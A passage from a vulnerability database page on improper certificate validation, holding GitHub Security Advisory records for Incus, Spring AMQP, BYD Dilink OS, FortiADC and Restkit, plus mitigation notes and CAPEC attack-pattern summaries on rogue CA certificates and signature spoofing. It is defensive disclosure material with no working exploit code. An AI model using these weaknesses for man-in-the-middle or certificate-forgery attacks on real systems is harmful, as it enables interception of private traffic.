poc:945758c6900211055b3b0b6d2ab9617a9f9dbeb70e4c3b9710dc47aa01345369\nImage exported successfully! \n$ cat incus.tar.xz rootfs.squashfs | sha256sum\nd3ec6f76cc1e4e49479e52c69b3d71430748f7c86d1214f44893e131392ad002 -\n```",
"id": "GHSA-p8mm-23gg-jc9r",
"modified": "2026-03-27T17:08:07Z",
"published": "2026-03-27T17:08:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lxc/incus/security/advisories/GHSA-p8mm-23gg-jc9r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33542"
},
{
"type": "WEB",
"url": "https://github.com/lxc/incus/commit/04e97418189f743411884afb81a3384e6218b8cd"
},
{
"type": "WEB",
"url": "https://github.com/lxc/incus/commit/4a80447c52d6bc05d3322feeb5395f581e7a80e4"
},
{
"type": "WEB",
"url": "https://github.com/lxc/incus/commit/72688b7d9400c8f3c17ad0f93a7c1aeb89627307"
},
{
"type": "WEB",
"url": "https://github.com/lxc/incus/commit/ee26f72524ab60a4abcfd4e52667c52bb24364fc"
},
{
"type": "PACKAGE",
"url": "https://github.com/lxc/incus"
},
{
"type": "WEB",
"url": "https://github.com/lxc/incus/releases/tag/v6.23.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:L/VI:H/VA:N/SC:H/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Incus does not verify combined fingerprint when downloading images from simplestreams servers"
}
GHSA-P8QJ-FJ6R-W7Q9
Vulnerability from github – Published: 2026-06-10 00:31 – Updated: 2026-06-10 00:31Applications that configure their broker connection via RabbitConnectionFactoryBean.setUri("amqps://...") without also calling setUseSSL(true) get TLS encryption with no certificate validation and no hostname verification.
Affected versions: Spring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17.
{
"affected": [],
"aliases": [
"CVE-2026-41714"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-10T00:16:51Z",
"severity": "MODERATE"
},
"details": "Applications that configure their broker connection via RabbitConnectionFactoryBean.setUri(\"amqps://...\") without also calling setUseSSL(true) get TLS encryption with no certificate validation and no hostname verification.\n\nAffected versions:\nSpring AMQP 4.0.0 through 4.0.3; 3.2.0 through 3.2.10; 3.1.0 through 3.1.15; 2.4.0 through 2.4.17.",
"id": "GHSA-p8qj-fj6r-w7q9",
"modified": "2026-06-10T00:31:51Z",
"published": "2026-06-10T00:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41714"
},
{
"type": "WEB",
"url": "https://spring.io/security/cve-2026-41714"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P8XC-W865-2HHR
Vulnerability from github – Published: 2025-04-23 21:30 – Updated: 2025-04-24 15:30BYD QIN PLUS DM-i Dilink OS v3.0_13.1.7.2204050.1 to v3.0_13.1.7.2312290.1_0 was discovered to cend broadcasts to the manufacturer's cloud server unencrypted, allowing attackers to execute a man-in-the-middle attack.
{
"affected": [],
"aliases": [
"CVE-2025-28169"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-23T20:15:43Z",
"severity": "HIGH"
},
"details": "BYD QIN PLUS DM-i Dilink OS v3.0_13.1.7.2204050.1 to v3.0_13.1.7.2312290.1_0 was discovered to cend broadcasts to the manufacturer\u0027s cloud server unencrypted, allowing attackers to execute a man-in-the-middle attack.",
"id": "GHSA-p8xc-w865-2hhr",
"modified": "2025-04-24T15:30:49Z",
"published": "2025-04-23T21:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28169"
},
{
"type": "WEB",
"url": "https://gist.github.com/rainymode/bfd976ecbe0d0b776fd930375156c19c"
},
{
"type": "WEB",
"url": "https://www.byd.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-P8XM-24PH-GVRG
Vulnerability from github – Published: 2024-07-09 18:30 – Updated: 2024-07-09 18:30An improper certificate validation vulnerability [CWE-295] in FortiADC 7.4.0, 7.2 all versions, 7.1 all versions, 7.0 all versions may allow a remote and unauthenticated attacker to perform a Man-in-the-Middle attack on the communication channel between the device and public SDN connectors.
{
"affected": [],
"aliases": [
"CVE-2023-50179"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-09T16:15:03Z",
"severity": "MODERATE"
},
"details": "An improper certificate validation vulnerability [CWE-295] in FortiADC 7.4.0, 7.2 all versions, 7.1 all versions, 7.0 all versions may allow a remote and unauthenticated attacker to perform a Man-in-the-Middle attack on the communication channel between the device and public SDN connectors.",
"id": "GHSA-p8xm-24ph-gvrg",
"modified": "2024-07-09T18:30:48Z",
"published": "2024-07-09T18:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50179"
},
{
"type": "WEB",
"url": "https://fortiguard.fortinet.com/psirt/FG-IR-23-480"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P9CV-HRXR-FXX8
Vulnerability from github – Published: 2022-05-17 01:59 – Updated: 2024-10-21 21:51Restkit allows man-in-the-middle attackers to spoof TLS servers by leveraging use of the ssl.wrap_socket function in Python with the default CERT_NONE value for the cert_reqs argument.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "restkit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "4.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2015-2674"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2023-08-03T21:27:58Z",
"nvd_published_at": "2017-08-09T18:29:00Z",
"severity": "MODERATE"
},
"details": "Restkit allows man-in-the-middle attackers to spoof TLS servers by leveraging use of the `ssl.wrap_socket` function in Python with the default CERT_NONE value for the cert_reqs argument.",
"id": "GHSA-p9cv-hrxr-fxx8",
"modified": "2024-10-21T21:51:08Z",
"published": "2022-05-17T01:59:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2674"
},
{
"type": "WEB",
"url": "https://github.com/benoitc/restkit/issues/140"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1202837"
},
{
"type": "PACKAGE",
"url": "https://github.com/benoitc/restkit"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/restkit/PYSEC-2017-69.yaml"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2015/03/23/7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Restkit Does Not Validate TLS certificates"
}
Mitigation
Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner's public key.
Mitigation
If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname.
CAPEC-459: Creating a Rogue Certification Authority Certificate
An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their "to be signed" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority.
CAPEC-475: Signature Spoofing by Improper Validation
An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.